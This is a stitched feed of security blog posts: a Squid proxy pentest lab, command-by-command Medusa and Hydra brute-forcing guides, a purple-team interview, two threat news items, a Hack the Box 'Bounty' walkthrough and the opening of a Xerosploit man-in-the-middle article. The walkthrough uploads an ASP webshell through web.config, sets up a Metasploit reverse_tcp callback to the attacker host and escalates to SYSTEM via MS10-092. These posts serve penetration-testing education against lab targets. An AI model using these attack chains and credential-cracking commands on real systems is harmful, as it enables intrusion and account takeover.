Here we had set forwarded_for off and save the file, then use the following command to restart the Squid Proxy.

sudo service squid3 restart

Configuring Apache service for Web Proxy

Now open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement the following rules on /html directory over localhost or Machine IP (192.168.1.103)

<Directory /var/www/html/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order deny,allow
                deny from all
        allow from 127.0.0.1 192.168.1.103
</Directory>

Now the save the file and restart the apache service with the help of following command.

service apache2 start

Now when someone try to access web services through our network i.e. 192.168.1.103, he/she will welcome by following web page

“Error 403 Forbidden- You don’t have permission to access <requested page>”.

When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.

Web Proxy Penetration Testing

For web Proxy penetration testing we had already set-up lab for web application server such as DVWA and SQli DHAKKAN (Read Article from here) and wordpress (Read Article from here).

Now to test whether our  proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter proxy server IP address (192.168.1.103) and Port (3128) to be used for all protocol.

 

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

Directory Brute force Attack on Proxy Server Using DIRB Tool

While making directory brute force attack with the help of DIRB we can use –p option, it enables proxy URL to be used for all requests, by default it works on port 1080. As you have observe, on exploring target network IP in the web browser it put up “Access forbidden error” which means this web page is running behind some proxy.

dirb http://192.168.1.103
dirb http://192.168.1.103 –p 192.168.1.103:3128

From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any directory or file on executing 1st command where as in 2nd command executed successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool

Similarly while scanning any network running behind proxy server, we can use -useproxy option to scan the vulnerability.

nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128

From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any result on executing 1st command where as in 2nd command executed successfully.

SQL Injection on Proxy Server Using Sqlmap Tool

As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

 

Hence we can use –proxy options to connect to the target URL, therefore execute following command:

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

Now from the given below image you can observe that we have successfully retrieve database name by exploiting SQL injection vulnerability.

WordPress Scanning on Proxy Server Using WPScan Tool

As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content

Hence we can use –proxy options to connect to the target URL, therefore execute the following command:

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content  --proxy http://192.168.1.103:3128

Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Web Proxy Penetration Lab Setup Testing using Squid appeared first on Hacking Articles.

Why you need to know about Penetration Testing and Compliance Audits?

We live in an age where data flows like water, becoming the new life source of our everyday ventures. As such, you can just imagine what all of that entails and the weight that data receive, especially when it comes to a decision making on how to handle this fairly new and arguably invaluable resource. Of course, we are well aware from a very young age that our water needs to be pure, filtered

Comprehensive Guide on Medusa – A Brute Forcing Tool

Hello friends!! Today we are going to discuss – How much impactful Medusa is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article we have discussed each option available in Medusa to make brute force attack in various scenario. 

Table OF Content

  • Introduction to Medusa and its features
  • Password Cracking For Specific Username
  • Username Cracking for Specific Password
  • Cracking Login Credential
  • Making Brute Force Attack on Multiple Host
  • Attacking on Specific Port Instead of Default
  • NULL/Same as Login Attempt
  • Save logs to Disk
  • Stop on Success
  • Suppress Startup Banner
  • Verbose Mode
  • Error Debugging Mode
  • Using Combo Entries
  • Resuming the Brute Force Attack

Introduction to Medusa and its features

Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
  • Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3,  MS-SQL, SSHv2, among others)

Reference Source: http://www.foofus.net] 

Type “medusa” in the terminal without any options, it will dump all the available options it accepts along with their respective description.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]            : Target hostname or IP address

  -H [FILE]             : File containing target hostnames or IP addresses

  -u [TEXT]            : Username to test

  -U [FILE]             : File containing usernames to test

  -p [TEXT]            : Password to test

  -P [FILE]             : File containing passwords to test

  -C [FILE]             : File containing combo entries. See README for more information.

  -O [FILE]             : File to append log information to

  -e [n/s/ns]        : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]          : Name of the module to execute (without the .mod extension)

  -m [TEXT]          : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d                          : Dump all known modules

  -n [NUM]          : Use for non-default TCP port number

  -s                          : Enable SSL

  -g [NUM]           : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]           : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]          : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]           : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]           : Total number of logins to be tested concurrently

  -T [NUM]            : Total number of hosts to be tested concurrently

  -L                          : Parallelize logins using one username per thread. The default is to process

                 the entire username before proceeding.

  -f          : Stop scanning host after first valid username/password found.

  -F                          : Stop audit after first valid username/password found on any host.

  -b                          : Suppress startup banner

  -q                          : Display module’s usage information

  -v [NUM]           : Verbose level [0 – 6 (more)]

  -w [NUM]         : Error debug level [0 – 10 (more)]

  -V                         : Display version

  -Z [TEXT]            : Resume scan based on map of previous scan

As said above medusa is a brute forcing tool and you can use -d option to identify all available modules it contains.

Password Cracking For Specific Username

Medusa is very impactful tool and also quit easy to use for making brute force attack on any protocol.

Assume you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.

At that moment you should go with following command where -u option enables username parameter and -P options enable dictionary for password list.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Username Cracking for Specific Password

Assume you want to crack username for ftp (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is vice-versa situation compare to above situation.

At that moment you should go with following command where -U option enables dictionary for username list and -p options enable password parameter.

medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Cracking Login Credential

Suppose you want to crack username and password for ftp (or any other), wish to make username and password brute force attack by using dictionary to guess the valid combination

At that moment you should go with following command where -U option enables dictionary for username list and – P options enables dictionary for password list.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user-pass dictionary on multiple host in a network then you can use -M option that enables the host list parameter and make brute force attack using same dictionary and will try same number of login attempt on each HOST IP mention in the host list.

Here you can observe I had saved two host IP in a text file and then use following command to make brute force attack on multiple host by using same dictionary.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp

As you can observe it has found 2 valid FTP logins on each Host.

If  you have multiple host IP in your host list and you want to make brute force attack only few number of host then use -T option for total number of hosts to be tested concurrently.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2

As you can observe from given below the 1st command make brute force attack on single Host IP where as in 2nd command it is making brute force attack on two host IP simultaneously.

Attacking on Specific Port Instead of Default

Due to security concern the network admin change the port number of a service on another port. Medusa makes brute force attack on default port of a service as you can observe in above all attacks it has automatically making attack on port 21 for ftp login.

But you can use -n option that enables specific port number parameter and launch the attack on mention port instead of default port number.

Suppose on scanning the target network I found SSH is running port 2222 instead of 22 therefore I will execute following command for ssh login attack.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222

As you can observe, in 1st command of medusa it fail to connect on ssh as port 22 was close and it has found 1 valid password: 123 for username: raj for SSH login @ port 2222.

NULL/Same as Login Attempt

Using option -e along with ns enables three parameter null/same as login while making brute force attack on password field.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns

As you can observe with every username, it is trying to match the following combination along with the password list.

User “raj” and password “” as null password

User “raj” and password “raj” as same as login

Save logs to Disk

For the purpose of the record maintenance, better readability and future references, we save the output of the Medusa brute force attack onto a file. To this we will use the parameter -o of the medusa to save the output in a text file.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -o log.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /log.txt.

Stop on Success 

Supoose while using host list you want to Stop brute force attack on host after first valid username/password found then you can use -f option alone with command.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f

Even you can use -F option to Stop audit after first valid username/password found on any host in your command.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F

Suppress Startup Banner

If you want to hide banner of medusa while making brute force attack then use -b option to Suppress startup banner.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b

Verbose Mode

There are six levels for verbose mode for examine the attack details and also contain error debug option that contain ten level for debug mode. You can use -v option for verbose parameter and -w option for error debugging parameter.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6

Error Debugging Mode

As said above there are level from 0-10 for examining brute force attack at each level, here you will observe the result of 0-6 is approx. same with little difference and result from of level 7-10 is approx. same but varied from 0-6 level.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07

Debug mode is showing waittime, socket, send data size and received data size, module detail and path.

 

Using Combo Entries

Using -c option enables combo file parameter, the combo file should have one record per line and have the values colon separated in the format host_IP:username:password. If any of the three fields are left blank, the respective information should be delivered either as a global value or as a list in a file.

The following combinations are possible in the combo file:

    host:username:password

    host:username:

    host::-

    :username:password

    :username:

    ::password

    host::password

As you can observe in the given below image, we have userpass.txt file as our combo file format and we can use it along -C option to launch brute force attack.

medusa -M ftp -C userpass.txt

Resuming the Brute Force Attack

Sometime while making brute force, the attack get paused/halt or cancel accidently at this moment to save your time you can use -z option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1st attempt.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

Now you can observe the output result from the given below image where after pressing ctrl C it stop the attack and then add the highlighted text in your command to resume the attack and continue it.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.

Repeat same as above, now compare the result after executing all three command you will notice it has continue the brute-forcing from the last dropped attempt

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Medusa – A Brute Forcing Tool appeared first on Hacking Articles.

Comprehensive Guide on Hydra – A Brute Forcing Tool

Hello friends!! Today we are going to discuss – How much impactful hydra is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article we have discussed each option available in hydra to make brute force attack in various scenario. 

Table of Content

  • Introduction to hydra
  • Multiple Feature of Hydra
  • Password Guessing For Specific Username
  • Username Guessing For Specific Password
  • Cracking Login Credential
  • Use Verbose or Debug Mode for Examining Brute Force
  • NULL/Same as Login/Reverse login Attempt
  • Save Output to Disk
  • Resuming The Brute Force Attack
  • Password Generating Using Various Set of Character
  • Attacking on Specific Port Instead of Default
  • Making Brute Force Attack on Multiple Host

Introduction to Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Multiple Feature of Hydra

Since we are using GNOME build of Kali Linux therefore the “thc-hydra” package is already included by default, all we need to do, open the terminal and just type “hydra -h” and press Enter. You will welcome by its help screen.

-R :                                         restore a previous aborted/crashed session

-I :                                           ignore an existing restore file.

-S :                                          perform an SSL connect

-s :                                          PORT   if the service is on a different default port, define it here

-l LOGIN or -L :                   FILE login with LOGIN name, or load several logins from FILE

-p PASS  or -P :                  FILE  try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET : password bruteforce generation, type “-x -h” to get help

-e nsr :                                  try “n” null password, “s” login as pass and/or “r” reversed login

-u :                                         loop around users, not passwords (effective! implied with -x)

-C FILE :                                colon separated “login:pass” format, instead of -L/-P options

-M FILE :                               list of servers to be attacked in parallel, one entry per line

-o FILE :                                write found login/password pairs to FILE instead of stdout

-f / -F :                                  exit when a login/pass pair is found (-M: -f per host, -F global)

-t TASKS :                             run TASKS number of connects in parallel (per host, default: 16)

-w / -W TIME :                   wait time for responses (32s) / between connects per thread

-4 / -6 :                                  prefer IPv4 (default) or IPv6 addresses

-v / -V / -d :                         verbose mode / show login+pass for each attempt / debug mode

-U :                                         service module usage details

server :                                 the target server (use either this OR the -M option)

service :                               the service to crack (see below for supported protocols)

OPT :                                     some service modules support additional input (-U for module help)

Reference Source: https://tools.kali.org/password-attacks/hydra

Password Guessing For Specific Username

Hydra is very impactful tool and also quit easy to use for making brute force attack on any protocol.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]                                                                          

Suppose you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.

At that moment you should go with following command where -l option enables username parameter and -P options enable dictionary for password list.

hydra -l raj -P pass.txt 192.168.1.108 ftp

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Username Guessing For Specific Password

Suppose you want to crack username for ftp (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is vice-versa situation compare to above situation.

At that moment you should go with following command where -L option enables dictionary for username list and -p options enable password parameter.

hydra -L user.txt -p 123 192.168.1.108 ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Cracking Login Credential

Suppose you want to crack username and password for ftp (or any other), wish to make username and password brute force attack by using dictionary to guess the valid combination

At that moment you should go with following command where -L option enables dictionary for username list and – P options enables dictionary for password list.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Use Verbose or Debug Mode for Examining Brute Force

You can use -V option along with each command, with the help of verbose mode you can observe the each attempt for matching valid combination of username and password. If you will observe the given below image then you will find there are 5 username in user.txt file (L=5) and 5 passwords in pass.txt file (P=5) and hence the total number of login attempt will be 5*5=25.

Even you can use -d option that enables debug and verbose mode together and shows complete detail of attacking mode.

As you can observe the verbose mode is showing each attempt for matching valid credential for username and password with the help of user.txt and pass.txt as well as debug mode is showing waittime, conwait, socket, send pid and received pid

NULL/Same as Login/Reverse login Attempt

Using option -e along with nsr enables three parameter null/same as login/reverse login while making brute force attack on password field, if you will observe the given below image then you will notice that, this time L=5 and automatically P=8 which means now the total number of login tries will be 5*8=40.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr

As you can observe with every username, it is trying to match the following combination along with the password list.

Login “root” and pass “” as null password

Login “root” and pass “root” as same as login

Login “root” and pass “toor” as reverse of login

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we save the output of the hydra brute force attack onto a file. To this we will use the parameter -o of the hydra to save the output in a text file.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /output.txt.

Resuming the Brute Force Attack

Sometime while making brute force, the attack get paused/halt or cancel accidently at this moment to save your time you can use -r option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1st attempt.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp
hydra -R

Now you can observe the output result from the given below image where after pressing ctrl C it stop the attack and then type hydra -R to resume the attack and continue it.

Password Generating Using Various Set of Character

Hydra has -x option that enables password generation option that involves following instructions:

-x MIN:MAX:CHARSET

MIN is use to specify the minimum number of characters in the password

MAX is use to specify the maximum number of characters in the password

CHARSET is use to specify a specification of the characters to use in the generation valid CHARSET values are: ‘a’ for lowercase letters, ‘A’ for uppercase letters, ‘1’ for numbers, and for all others, just add their real representation.

-y disable the use if the above letters as placeholders

Now suppose we want to try 123 as password for that I should set MIN=1, MAX=3 CHARSET 1 for generating numeric password for given username and run following command as said.

hydra -l shubham -x 1:3:1 ftp://192.168.1.108
or
hydra -l raj -x 1:3:1 192.168.1.108 ftp
hydra -l raj -x 1:3:1 192.168.1.108 ftp -y

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Now suppose we want to try abc as password for that I should set MIN=1, MAX=3 CHARSET a for generating lowercase character password for given username and run following command as said.

hydra -l shubham -x 1:3:a ftp://192.168.1.108 -V

As you can observe it has found 1 valid password: abc for username: shubham for FTP login.

Attacking on Specific Port Instead of Default

Due to security concern the network admin change the port number of a service on another port. Hydra makes brute force attack on default port of a service as you can observe in above all attacks it has automatically making attack on port 21 for FTP login.

But you can use -s option that enables specific port number parameter and launch the attack on mention port instead of default port number.

Suppose on scanning the target network I found FTP is running port 2121 instead of 21 therefore I will execute following command for ftp login attack.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user-pass dictionary on multiple host in a network then you can use -M option that enables the host list parameter and make brute force attack using same dictionary and will try same number of login attempt on each HOST IP mention in the hosts list.

Here you can observe I had saved two host IP in a text file and then use following command to make brute force attack on multiple host by using same dictionary.

hydra -L user.txt -P pass.txt -M hosts.txt ftp

As you can observe it has found 2 valid FTP logins on each Host.

Suppose you had given a list of multiple targets and wish to finish the brute force attack as soon as it found valid login for any host IP, then you should use -F options which enable finish parameter when found valid credential for either host from inside the host list.

hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F

As you can observe it has found 1 valid FTP logins for 192.168.1.108 and finish the attack.

Disclaimer by Hydra – Please do not use in military or secret service organizations, or for illegal purposes.

Author: Shubham Sharma is a Technical writer, Researcher and Penetration tester contact here

The post Comprehensive Guide on Hydra – A Brute Forcing Tool appeared first on Hacking Articles.

A Day In The Life Of A Purple Teamer

Considering the ruthless tactics attackers will use to gain access to an organization’s assets, security professionals are now seeking to have both red and blue teaming skills. We asked Dimitrios Bougioukas, our training director, a few questions about the challenges and opportunities that come with being a purple teamer.

What are your main responsibilities as a Training Director & Purple Teamer?

My main responsibilities include directing eLearnSecurity’s course development activities, leading the IT security research endeavors of the company and constantly monitoring the threat landscape as well as the latest technology advancements in order to create new courses that cover new and emerging IT security segments.

What part of this job do you personally find most satisfying? Most challenging?
As a Training Director, my upper goal is to create the next generation of complete and up-to-date IT security professionals. We take our students’/clients’ education seriously and we strive towards providing the most practical and up-to-date IT security courses in the market. As you can imagine, when I see students passing our challenging exams and applying the knowledge they obtained to effectively secure their organization, it is the most fulfilling and satisfying feeling in the world. On the other hand, the most challenging part of my job is conducting IT security research, discovering new attack vectors, security bypasses etc. To do so, understanding the underpinnings and full capabilities of each technology is required and this is just the beginning. Countless attempts of trying to subvert each technology’s normal flow by supplying all kinds of imaginative input is also required and this is equally demanding.
What are the most important skills for Purple Teamers?
To become a purple teamer, you will have to be equally skilled at (web app, infrastructure, mobile, cloud) penetration testing and at incident response/threat hunting. Reverse engineering and/or information security management skills are also nice to have. Especially the information security management skills are of great importance, since on enterprise environments technical skills and skilled personnel is nothing without properly implemented IT security processes, planning, and management.
What jobs can you get with purple teaming skills?
To be honest, when you have mastered both Red and Blue team skills, the job possibilities are endless. And I don’t just mean that you can fill a penetration testing or an incident response/threat hunting position with ease. I mean that you will be in the position to even fill an IT security management position with minimum effort (of course some information security management and/or risk management skills will be required to do so).
What advice would you give to someone aspiring to become a successful purple teamer?

I am sure that you have figured by now, that becoming a Purple Teamer is a demanding endeavor. I would recommend being methodical, patient and passionate while developing your skillset. The danger of  “educational fatigue” is high during this journey, so, take it easy and enjoy every destination.

 

Find out how to develop proficiency in both advanced penetration testing and threat intelligence with our Purple Team Member training path:
    >  DISCOVER THIS TRAINING PATH

 

Connect with us on Social Media

LinkedIn | Facebook | Twitter  | Instagram

Enterprises Using IaaS or PaaS Have 14 Misconfigured Instances on Average, Cloud Adoption Study Finds

Enterprises using infrastructure-as-a-service (IaaS) or platform-as-a-service (PaaS) solutions have 14 misconfigured instances on average running at a given time.

A recent cloud adoption study by McAfee found that organizations have increased their usage of the cloud over time. The average number of cloud services in use per company grew from 1,682 in 2017 to 1,935 a year later. This growth was evident in both the number of enterprise cloud apps and consumer cloud apps.

But while organizations are increasingly turning to the cloud to satisfy their business needs, they aren’t taking the necessary steps to safeguard their cloud-based assets, the researchers observed. According to the report, some of the most common oversights involved inactive data encryption and unrestricted outbound access.

How Do Cloud Misconfigurations Put Data at Risk?

Cloud misconfigurations directly jeopardize organizations’ data. McAfee customers who turn on data loss prevention (DLP) discovered an average of 1,527 DLP incidents in their IaaS or PaaS storage per month. Overall, 27 percent of organizations using PaaS experienced a data theft incident affecting their cloud infrastructure.

Part of the problem is that no two cloud service providers (CSPs) offer the same security controls. Some CSPs even lack some of the most basic security measures. Just 8 percent of providers encrypted stored data at rest, for instance, while only 19.2 percent supported multifactor authentication (MFA).

How to Cope With Increasing Cloud Adoption

Security professionals can help their organizations stay protected amid increasing cloud adoption by embedding corporate security policies into contracts with CSPs. They should also consider conducting regular penetration tests to map their environments for vulnerabilities.

Sources: McAfee

The post Enterprises Using IaaS or PaaS Have 14 Misconfigured Instances on Average, Cloud Adoption Study Finds appeared first on Security Intelligence.

DemonBot Targeting Hadoop Clusters to Perform DDoS Attacks

A new bot called DemonBot is targeting Hadoop clusters to execute distributed denial-of-service (DDoS) attacks.

The Radware Threat Research Center recently observed a threat actor exploiting a Hadoop Yet Another Resource Negotiator (YARN) unauthenticated remote command execution. This method of attack enables the malicious agent to infect clusters of Hadoop, an open source distributed processing framework that helps big data apps run in clustered systems, with DemonBot. Upon successful infection, the threat connects to its command-and-control (C&C) server and transmits information about the infected device.

Why Cloud Infrastructure Servers Are Juicy Targets

The threat’s goal is to leverage infected cloud infrastructure servers to conduct DDoS attacks. At this juncture, it is not exhibiting worm-like behavior akin to Mirai. Instead, it relies on 70 exploit servers for distribution, infrastructure that helps it perform 1 million exploits every day.

That being said, Radware found DemonBot to be binary-compatible with most Internet of Things (IoT) devices, which means the threat could spread to other types of products.

DemonBot isn’t the first bot to target cloud infrastructure servers like Hadoop clusters. In early October, a security researcher reported on Twitter that handlers of the Sora IoT botnet attempted to exploit the same YARN abused by DemonBot.

Radware attributed the growing interest in Hadoop to the fact that cloud infrastructure servers allow bad actors to stage larger and more stable DDoS attacks using multiple vectors, such as User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) floods.

How to Defend Against DemonBot

Security professionals can help protect their organizations against DemonBot by conducting a proper risk assessment on their cloud deployment. From there, they should enlist the help of penetration testers to map the vulnerabilities affecting their deployment.

Security teams should also look to invest in mitigation tools and services that specialize in defending against a DDoS attack.

Sources: Radware, Ankit Anubhav

The post DemonBot Targeting Hadoop Clusters to Perform DDoS Attacks appeared first on Security Intelligence.

Hack the Box: Bounty Walkthrough

Today we are going to solve another CTF challenge “Bounty”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Bounty is 10.10.10.93

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap –A 10.10.10.93

Things to be observers from its result are port 80 is open for http and Microsoft-IIS/7.5 is service banner.

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

Since we didn’t get any remarkable clue from the home page, therefore, we have opted Dirbuster tool for directory enumeration thus execute the following, here we had used directory-list-2.3-medium.txt directory for web directory enumeration.

Hmm!! Here I received HTTP response for /transfer.aspx file and /uploadedFiles directories.

When we have explored 10.10.10.93/transfer.aspx in the browser and further welcomed by following web Page given below. The following web page lets you upload a file.

We try have many attempts to upload a file but every time we get a message “Invalid File. Please try again”.

 After so many efforts, I found this link on googling “IIS 7.5 rce upload”. Here we read about the web.config file, which plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in Apache web server. Uploading a .htaccess file to bypass protections around the uploaded files is a known technique.

So with the help of above given link we create an asp file to run web.config which will response by adding 1 and 2.

As you can observe, our web.config file is successfully uploaded inside /uploadedfiles/ directory.

So we have executed this file, it has given the expected response “3” which is sum of 1 and 2. Hence now we can inject malicious code in this file which can create RCE vulnerability through it.

Luckily!! I found this link:  https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp link for ASP webshell . So I copied the whole content of asp webshell in our web.config file and upload it.

On executing updated web.config file, it creates a form where we can run command as RCE. Once such surface you can run any malicious command to exploit RCE. Here we will be executing powershell code generated via web delivery module of metasploit.

msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) run

Past the highlighted code given in the image mstasploit inside the text file and run this code to get meterpreter session.

Great!! We have successfully got meterpreter session of the victim’s machine, now let’s find out the user.txt file to finish this task.

We successfully found user.txt file inside /users/merlin/Desktop. Next we need to find out root.txt file to finish this challenge and as we know for that we need to escalated root privilege.

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with first option as highlighted in the image.

This Vulnerability in Task Scheduler could allow elevation of privileges. This module has been tested on vulnerable builds of Windows Vista , Windows 7 , Windows Server 2008 x64 and x86.

use exploit/windows/local/ms10_092_schelevator
msf post(windows/local/ms10_092_schelevator) > set lhost  10.10.14.2
msf post(windows/local/ms10_092_schelevator) > set lport 5555
msf post(windows/local/ms10_092_schelevator) > set session 1
msf post(windows/local/ms10_092_schelevator) > exploit

Another Meterpreter session gets opened, once the selected exploit has been executed.

getsystem
getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

Successfully we have found the root.txt from the path: C:\Users\Administrator \Desktop.

Wonderful!! We had completed the both tasks and hacked this box.

Happy Hacking!!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box: Bounty Walkthrough appeared first on Hacking Articles.

Xerosploit- A Man-In-The-Middle Attack Framework

Networking is an important platform for an Ethical Hacker to check on, many of the threat can come from the internal network like network sniffing, Arp Spoofing, MITM e.t.c, This article is on Xerosploit which provides advanced MITM attack on your local network to sniff packets, steal password etc.

Table of Content

  • Introduction to Xerosploit
  • Man-In-The-Middle
  • Xerosploit Installation
  • PSCAN (Port Scanner)
  • DOS (Denial of service)
  • INJECTHTML (HTML INJECTION)
  • SNIFF
  • dspoof
  • YPLAY
  • REPLACE
  • Driftnet

Introduction to Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

For those who are not familiar with Man-in-the-middle attack, welcome to the world of internal network attacks

Dependencies

  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Built-up with various Features:

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download intercaption and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Drifnet
  • Webpage defacement and more 

Man-In-The-Middle

A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. There are many open source tools available online for this attack like Ettercap, MITMF, Xerosploit, e.t.c

